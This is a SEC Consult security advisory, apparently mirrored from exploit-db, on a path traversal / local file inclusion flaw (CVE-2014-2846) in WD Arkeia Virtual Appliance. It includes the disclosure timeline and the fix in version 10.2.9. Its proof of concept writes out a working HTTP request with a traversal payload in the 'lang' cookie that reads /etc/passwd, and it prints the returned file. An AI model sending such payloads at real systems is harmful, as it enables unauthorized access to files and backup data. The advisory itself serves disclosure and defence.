WD Arkeia Virtual Appliance 10.2.9 – Local File Inclusion

  • 作者: SEC Consult
    日期: 2014-04-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33005/
  • SEC Consult Vulnerability Lab Security Advisory < 20140423-0 >
    =======================================================================
    title: Path Traversal/Remote Code Execution
    product: WD Arkeia Virtual Appliance (AVA)
     vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3.
    fixed version: 10.2.9
     CVE number: CVE-2014-2846
     impact: critical
     homepage: http://www.arkeia.com/
    found: 2014-03-05
     by: M. Lucinskij
     SEC Consult Vulnerability Lab
     https://www.sec-consult.com
    =======================================================================
    
    Vendor description:
    -------------------
    "The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and
    affordable data protection for enterprises seeking to optimize the benefits of
    virtualization. The AVA offers all the features of the hardware appliance, but
    permits you to use your own choice of hardware."
    
    source:
    http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance
    
    
    Business recommendation:
    ------------------------
    The identified path traversal vulnerability can be exploited by unauthenticated
    remote attackers to gain unauthorized access to the WD Arkeia virtual appliance
    and stored backup data.
    
    SEC Consult recommends to restrict access to the web interface of the WD Arkeia
    virtual appliance using a firewall until a comprehensive security
    audit based on a security source code review has been performed and all
    identified security deficiencies have been resolved by the affected vendor.
    
    
    Vulnerability overview/description:
    -----------------------------------
    The WD Arkeia virtual appliance is affected by a path traversal vulnerability.
    Path traversal enables attackers access to files and directories outside the
    web root through relative file paths in the user input.
    
    An unauthenticated remote attacker can exploit the identified vulnerability in
    order to retrieve arbitrary files from the affected system and execute system
    commands.
    
    
    Proof of concept:
    -----------------
    The path traversal vulnerability exists in the
    /opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie
    is not properly checked before including a file using the PHP include()
    function. Example of the request that demonstrates the vulnerability by
    retrieving the contents of the /etc/passwd file:
    
    POST /login/doLogin HTTP/1.0
    Host: $host
    Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00
    Content-Length: 25
    Content-Type: application/x-www-form-urlencoded
    
    password=bbb&username=aaa
    
    The response from the affected application:
    
    HTTP/1.1 200 OK
    Date: Wed, 05 Mar 2014 08:29:35 GMT
    Server: Apache/2.2.15 (CentOS)
    X-Powered-By: PHP/5.3.3
    Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/
    Cache-Control: no-cache
    Pragma: no-cache
    Charset: UTF-8
    Content-Length: 1217
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
    dhcpd:x:177:177:DHCP server:/:/sbin/nologin
    tcpdump:x:72:72::/:/sbin/nologin
    {"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or
    login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n
    ull]}}
    
    Furthermore, the identified vulnerability can be also exploited to
    execute arbitrary PHP code/system commands by including files that
    contain specially crafted user input.
    
    
    Vulnerable / tested versions:
    -----------------------------
    The vulnerability has been verified to exist in the 10.2.7 version of the WD
    Arkeia virtual appliance.
    
    According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since
    7.0.3 are affected.
    
    
    Vendor contact timeline:
    ------------------------
    2014-03-13: Contacting vendor through support@arkeia.com
    2014-03-14: Vendor confirms the vulnerability.
    2014-03-17: Vendor provides a quick fix and a release schedule.
    2014-04-21: Vendor releases a fixed version
    2014-04-23: SEC Consult releases a coordinated security advisory.
    
    
    Solution:
    ---------
    Update to the most recent version (10.2.9) of Arkeia Network Backup.
    
    More information can be found at:
    http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution
    
    
    Workaround:
    -----------
    
    
    Advisory URL:
    -------------
    https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    SEC Consult Vulnerability Lab
    
    SEC Consult
    Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
    
    Headquarter:
    Mooslackengasse 17, 1190 Vienna, Austria
    Phone: +43 1 8903043 0
    Fax: +43 1 8903043 15
    
    Mail: research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: http://blog.sec-consult.com
    Twitter: https://twitter.com/sec_consult
    
    Interested to work with the experts of SEC Consult?
    Write to career@sec-consult.com
    
    EOF M. Lucinskij / @2014